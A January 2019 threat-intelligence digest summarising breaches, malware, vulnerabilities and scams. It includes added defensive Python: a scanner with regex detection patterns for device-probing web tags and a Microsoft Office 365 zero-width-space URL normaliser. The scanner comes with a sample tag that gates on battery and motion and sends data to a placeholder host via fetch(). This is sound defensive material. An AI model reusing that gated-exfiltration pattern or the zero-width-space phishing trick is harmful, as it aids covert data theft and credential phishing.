Cyware Daily Threat Intelligence January 11, 2019

Top Breaches Reported in Last 24 Hours

Unprotected MongoDB leaks data again
An unprotected MongoDB database containing around 854 GB of data, including over 200 million resumes of Chinese job seekers, was left open to the public for at least a week. The exposed CVs contained full names, dates of birth, phone numbers, email addresses and other personal details of the individuals concerned.

DNS hijacking campaign
A sophisticated hacking campaign involving the hijacking of dozens of DNS domains has been discovered by security researchers. The domains belong to government, telecommunications and internet infrastructure entities across the Middle East and North Africa, Europe and North America. Control of a domain's DNS records lets an attacker redirect its web and mail traffic through infrastructure they control. Iran-based threat actors are believed to be behind the campaign.

USD 18.6 million stolen
Chinese fraudsters have reportedly siphoned off about $18.6 million from the Indian unit of Tecnimont SpA after winning the confidence of local managers. The scammers impersonated the firm's Chief Executive Officer (CEO) to carry out the fraud.

Top Malware Reported in Last 24 Hours

ICEPICK-3PC malware
A new malware strain dubbed ICEPICK-3PC has been found stealing device IP addresses by compromising websites' third-party tools, which are pre-loaded onto clients' platforms by self-service agencies. Once loaded, the malware performs a series of checks to evade detection: it inspects the user agent, device type, mobile operating system, battery level, and device motion and orientation. Signals of this kind separate a real handset in someone's hand from a desktop crawler, emulator or analysis sandbox, so the payload only runs where it is least likely to be observed.
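
The following is an added example, not code from the report or from the malware itself: a small static scanner that audits a third-party tag for the combination of device-probing checks described above plus an outbound channel. The browser APIs listed are real, but which of them ICEPICK-3PC actually calls is not stated in the report, so the mapping from signal to API, the flagging threshold, the sample tags and the placeholder host `collector.invalid` are all assumptions made for the example.

```python
import re

# Browser APIs that reveal whether a script is running on a real handset
# rather than on a desktop crawler, emulator or analysis sandbox. The groups
# follow the signals the report lists (user agent, device type, mobile OS,
# battery, motion and orientation); which exact APIs ICEPICK-3PC calls is not
# stated there, so this mapping is an assumption.
PROBE_PATTERNS = {
    "user_agent": [r"navigator\.userAgent", r"navigator\.platform"],
    "device_type": [r"navigator\.maxTouchPoints", r"ontouchstart"],
    "mobile_os": [r"\b(?:Android|iPhone|iPad)\b"],
    "battery": [r"navigator\.getBattery", r"\.dischargingTime"],
    "motion": [r"DeviceMotionEvent", r"devicemotion", r"deviceorientation"],
}

# Ways a tag can send what it collected off the page.
SINK_PATTERNS = [r"\bfetch\s*\(", r"XMLHttpRequest", r"sendBeacon", r"new\s+Image\s*\("]


def probe_categories(script: str) -> set:
    """Return the set of device-probing signal groups a script references."""
    return {
        name
        for name, patterns in PROBE_PATTERNS.items()
        if any(re.search(p, script) for p in patterns)
    }


def has_network_sink(script: str) -> bool:
    """True if the script has a way to send data to a remote host."""
    return any(re.search(p, script) for p in SINK_PATTERNS)


def assess(script: str, threshold: int = 3) -> dict:
    """Flag a tag that both probes several device signals and has somewhere to
    send the result. The threshold is a tuning assumption: one signal (usually
    the user agent) is normal for analytics; several together, combined with
    an outbound channel, is the gating-plus-exfiltration pattern."""
    cats = probe_categories(script)
    sink = has_network_sink(script)
    return {
        "categories": sorted(cats),
        "network_sink": sink,
        "flagged": len(cats) >= threshold and sink,
    }


# Constructed sample tags (not code from the real malware).
BENIGN_TAG = """
(function () {
  // ordinary analytics beacon: records the user agent and page path
  navigator.sendBeacon('/collect', JSON.stringify({
    ua: navigator.userAgent, path: location.pathname
  }));
})();
"""

SUSPICIOUS_TAG = """
(function () {
  // runs only on a handset that is unplugged and physically moving
  if (!/Android|iPhone/.test(navigator.userAgent)) { return; }
  navigator.getBattery().then(function (b) {
    if (b.charging || b.dischargingTime === Infinity) { return; }
    window.addEventListener('devicemotion', function (e) {
      if (e.acceleration && e.acceleration.x !== 0) {
        // collector.invalid is a placeholder host, not an indicator from the report
        fetch('https://collector.invalid/ip', { method: 'POST', body: navigator.userAgent });
      }
    }, { once: true });
  });
})();
"""

if __name__ == "__main__":
    for name, tag in (("benign", BENIGN_TAG), ("suspicious", SUSPICIOUS_TAG)):
        print(name, assess(tag))
```

Pattern matching on source text is only a first pass: a tag that is minified or builds API names at runtime will slip through, so in practice this belongs alongside a check of what the tag actually requests once loaded in an instrumented browser.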

ServHelper and FlawedGrace
Researchers have discovered that the TA505 threat actor group is using two new malware families to target the banking and retail industries: two variants of the ServHelper backdoor and the FlawedGrace remote access trojan (RAT). These tools give the attackers remote desktop access to infected machines and let them steal personal data.

Alcatel phones contain malware
An app named Weather Forecast-World Weather Accurate Radar has been found to contain malware. The app comes pre-installed on Alcatel smartphones and is also available for download on the Google Play store. Security researchers discovered that the app was harvesting users' data and sending it to a server in China.

Top Vulnerabilities Reported in Last 24 Hours

DX.Exchange fixes a flaw
Cryptocurrency and tokenized stock exchange platform DX.Exchange has fixed a critical bug that leaked users' sensitive data. The exchange was alerted to the bug by a trader and patched it promptly after the discovery.

Bug in MS Office
An information disclosure vulnerability tracked as CVE-2019-0560 has been discovered in Microsoft Office. The flaw allows documents containing ActiveX controls to leak user information such as usernames and passwords, which an attacker can then use to aid further attacks.

Bypassing MS Office 365 protection
Attackers are using a simple technique to bypass the security features of Microsoft Office 365. Known as the 'zero-width space' (ZWSP) technique, it inserts multiple zero-width space characters inside malicious URLs sent in phishing emails. Microsoft's email processing systems do not recognise the broken-up string as a link, so the URL is never inspected, while the recipient's mail client renders the zero-width characters as nothing and the link looks normal. This makes it easy for attackers to harvest credentials and other sensitive details from end users.
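
As an added illustration (not code from the report or from Microsoft), the script below shows why the trick works and how a mail filter can catch it: a naive URL matcher stops at the first zero-width character and sees only a fragment, while the same matcher run after stripping Unicode format characters recovers the full link. The set of zero-width code points, the regular expression and the two sample message bodies are constructed for the example and are not indicators from any real campaign.

```python
import re
import unicodedata

# Invisible code points that can be spliced into a URL. Anything in Unicode
# category Cf (format characters) is treated as invisible; the named set below
# is just the subset most often seen in this trick and is an assumption, not a
# list taken from the report.
ZERO_WIDTH = {
    "\u200b",  # ZERO WIDTH SPACE
    "\u200c",  # ZERO WIDTH NON-JOINER
    "\u200d",  # ZERO WIDTH JOINER
    "\u2060",  # WORD JOINER
    "\ufeff",  # ZERO WIDTH NO-BREAK SPACE
}

# A naive URL matcher of the kind a link-rewriting filter might use: it stops
# at the first character outside the URL-safe set, so a zero-width space cuts
# the match short.
NAIVE_URL = re.compile(r"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")


def is_invisible(ch: str) -> bool:
    return ch in ZERO_WIDTH or unicodedata.category(ch) == "Cf"


def strip_invisible(text: str) -> str:
    """Return text with every invisible format character removed."""
    return "".join(ch for ch in text if not is_invisible(ch))


def scan_message(body: str) -> dict:
    """Compare the URLs a naive scanner sees with those present after
    normalisation; URLs that only appear after normalisation were split by
    invisible characters."""
    cleaned = strip_invisible(body)
    naive_urls = NAIVE_URL.findall(body)
    real_urls = NAIVE_URL.findall(cleaned)
    obfuscated = [u for u in real_urls if u not in naive_urls]
    return {
        "hidden_chars": len(body) - len(cleaned),
        "naive_urls": naive_urls,
        "urls": real_urls,
        "obfuscated": obfuscated,
        # Only flag when hidden characters actually split a URL: zero-width
        # joiners also occur legitimately, e.g. inside emoji sequences.
        "suspicious": bool(obfuscated),
    }


# Constructed sample messages (not taken from any real phishing campaign).
PHISHING_BODY = (
    "Your mailbox is almost full. Restore access at "
    "https://lo\u200bgin.exa\u200bmple.com/verify now."
)
CLEAN_BODY = "Release notes are at https://example.com/docs for review."

if __name__ == "__main__":
    for name, body in (("phishing", PHISHING_BODY), ("clean", CLEAN_BODY)):
        print(name, scan_message(body))
```

The practical lesson is to normalise the message body (strip format characters, and ideally apply the same treatment to homoglyphs and HTML entities) before any link extraction or rewriting runs, rather than trying to enumerate every way a URL can be broken up.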

Top Scams Reported in Last 24 Hours

New Robocall scam
The Federal Trade Commission (FTC) is warning US residents about a new Social Security Number (SSN) scam. The robocall involves a fraudster pretending to be from the Social Security Administration (SSA) and trying to obtain the victim's SSN or money. In some cases, the impostor claims that the victim's bank account is about to be seized and advises the victim on how to keep the money safe, including putting it on gift cards. Users are advised never to share their SSN, bank account number or credit card number with anyone over the phone.
